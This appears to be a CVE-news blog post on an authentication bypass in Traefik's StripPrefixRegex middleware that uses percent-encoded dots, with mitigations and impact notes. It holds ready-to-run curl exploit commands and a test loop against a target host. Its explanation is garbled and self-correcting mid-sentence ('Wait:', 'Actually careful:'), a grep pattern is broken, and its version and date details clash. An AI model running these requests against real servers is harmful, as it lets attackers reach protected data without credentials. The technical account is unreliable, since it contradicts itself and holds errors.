Traefik, Authentication Bypass, (No CVE) Critical

Listen to this Post

How the mentioned CVE works (around 20 lines):

The vulnerability resides in Traefik’s StripPrefixRegex middleware. When handling a request, the middleware first decodes the URL path and matches it against a regex pattern (e.g., ^/api). It extracts the matched prefix from the decoded path and uses the byte length of that prefix (len(prefix)) to slice the encoded raw path (req.URL.RawPath). However, if the prefix contains percent-encoded characters, the byte lengths differ because encoded characters occupy more bytes (e.g., `%2e` is 3 bytes vs `.` is 1 byte). This mismatch causes `RawPath` to be sliced incorrectly. For a request like GET /api%2e/admin/secret, the decoded path is `/api./admin/secret` and the prefix match is `/api` (4 bytes). The encoded `RawPath` is `/api%2e/admin/secret` – slicing from index 4 yields %2e/admin/secret, which after `ensureLeadingSlash` becomes /.%2e/admin/secret? Actually careful: The shows `/api%2e` gives `%2e/admin/secret` then leading slash -> /.%2e/admin/secret? But the updated PoC says the raw path becomes `/./admin/secret` because `%2e` decodes to a dot. Wait: The middleware does not decode again; it slices the encoded string. For %2e, the encoded `RawPath` contains the literal characters %2e. Slicing after `/api` (which is 4 chars) gives %2e/admin/secret. Then `ensureLeadingSlash` adds a slash at front -> /%2e/admin/secret. That string is passed to `ForwardAuth` as X-Forwarded-Uri. The auth server sees `/%2e/admin/secret` and, assuming it doesn’t match protected paths like /admin/, allows the request. The backend, however, normalizes `%2e` to `.` and then interprets `/.` as a dot-segment per RFC 3986, which collapses to /, resulting in /admin/secret. Thus the protected content is served without authentication. The attacker only needs to inject `%2e` (percent-encoded dot) into the prefix portion of the URL.

dailycve form:

Platform: Traefik
Version: v3.6.11 (and possibly others)
Vulnerability: Auth bypass via path normalization
Severity: Critical
date: 2024-04-24 (approximate from disclosure)
Prediction: Patch expected within 2 weeks (already fixed in v3.7.0?)

Analytics under heading What Undercode Say:

Count requests with encoded dots in prefix
grep -E "%2[bash]" /var/log/traefik/access.log | wc -l
Simulate attack with curl
curl --path-as-is "http://localhost:8080/api%2e/admin/secret"
Test for vulnerable middleware chain using custom script
for enc in %2e %2E .%2e; do curl -s -o /dev/null -w "%{http_code}\n" "http://target/api${enc}/admin/secret"; done

Exploit:

Direct bypass using %2e (URL-encoded dot)
curl --path-as-is "http://<traefik-host>:8080/api%2e/admin/secrets"
Alternatively use double dot normalization
curl --path-as-is "http://<traefik-host>:8080/api%2e%2e/admin/secrets"
For BasicAuth-protected endpoints, add any credentials (they are ignored)
curl -u fake:fake --path-as-is "http://<traefik-host>:8080/api%2e/admin/config"

Protection from this CVE:

  • Upgrade Traefik to a patched version (v3.7.0 or higher) – official fix adjusts length calculation.
  • As a temporary workaround, avoid using `StripPrefixRegex` together with ForwardAuth, BasicAuth, or `DigestAuth` on the same router.
  • Implement additional input validation middleware that rejects URLs containing `%2e` (or %2E) before the path normalization step.
  • Use a reverse proxy with stricter path handling (e.g., nginx with `merge_slashes off` and explicit deny for dot-segments).

Impact:

  • Unauthenticated attackers can access any protected endpoint that relies on ForwardAuth, BasicAuth, or `DigestAuth` when `StripPrefixRegex` is in the chain.
  • Backends that normalize dot-segments per RFC 3986 (Express.js, Go http.ServeMux, Spring Boot, etc.) are vulnerable, turning `/.` or `/./` into /.
  • The bypass works silently – no login attempts or anomalies appear in auth logs for the real path; only dot-segment paths are logged.
  • Critical severity because it completely nullifies authentication for many routes, leading to data exposure, configuration retrieval, and potential remote code execution if admin endpoints are exposed.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top